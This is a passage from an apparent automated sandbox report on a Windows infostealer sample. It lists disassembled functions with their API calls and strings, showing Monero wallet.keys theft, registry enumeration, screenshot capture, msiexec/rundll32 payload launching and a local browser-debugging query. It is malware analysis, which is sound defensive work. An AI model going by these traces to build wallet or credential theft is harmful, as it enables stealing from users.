                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$FUA$GET
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3074848878-1334267432
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7c6cfe8f072345c0d8ee3fe0878bf99b8519b9812ff13126b9de66ca56af54dd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c6cfe8f072345c0d8ee3fe0878bf99b8519b9812ff13126b9de66ca56af54dd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59
                                                                                                                                                                                                                                                                                                                                  Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,0079E6F0,00000000,00020019,00000000,004205BE), ref: 00418534
                                                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004185E9
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3bab76db4babd043ab93a8c7c0ffcce015d68df8aeb58c96e27b6c2627456d69
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bab76db4babd043ab93a8c7c0ffcce015d68df8aeb58c96e27b6c2627456d69
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9
                                                                                                                                                                                                                                                                                                                                  Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateGlobalStream
                                                                                                                                                                                                                                                                                                                                  • String ID: `dAF$`dAF$image/jpeg
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2244384528-2462684518
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1e1502ffe7df4f36e924c94bff68ac4c47ef7db060b287346e75abcdc813549c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e1502ffe7df4f36e924c94bff68ac4c47ef7db060b287346e75abcdc813549c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                                                                                                                                                                                                                                                                                                                  Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0079D738,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3630751533-2791005934
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 730a252b7aad06c2510fd85ed99540bfc367cf222da66984589bfc32cc645b23
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 730a252b7aad06c2510fd85ed99540bfc367cf222da66984589bfc32cc645b23
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A
                                                                                                                                                                                                                                                                                                                                  Function 00413080 Relevance: 21.5, APIs: 3, Strings: 9, Instructions: 469COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExecuteShell$lstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$@z$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2507796910-2725256141
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 87d6deca1c029616c279b14b59621dfa721234777227895cf00b2e76695fb90a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87d6deca1c029616c279b14b59621dfa721234777227895cf00b2e76695fb90a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                                                                                                                                                                                                                                                                                                                  Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401327
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00798860,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401516
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                                                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1930502592-218353709
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2ddb265dfe82e0b211d8a1408d9ec598cb15a9d664cf4e49741297b36d48e36c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ddb265dfe82e0b211d8a1408d9ec598cb15a9d664cf4e49741297b36d48e36c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E
                                                                                                                                                                                                                                                                                                                                  Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
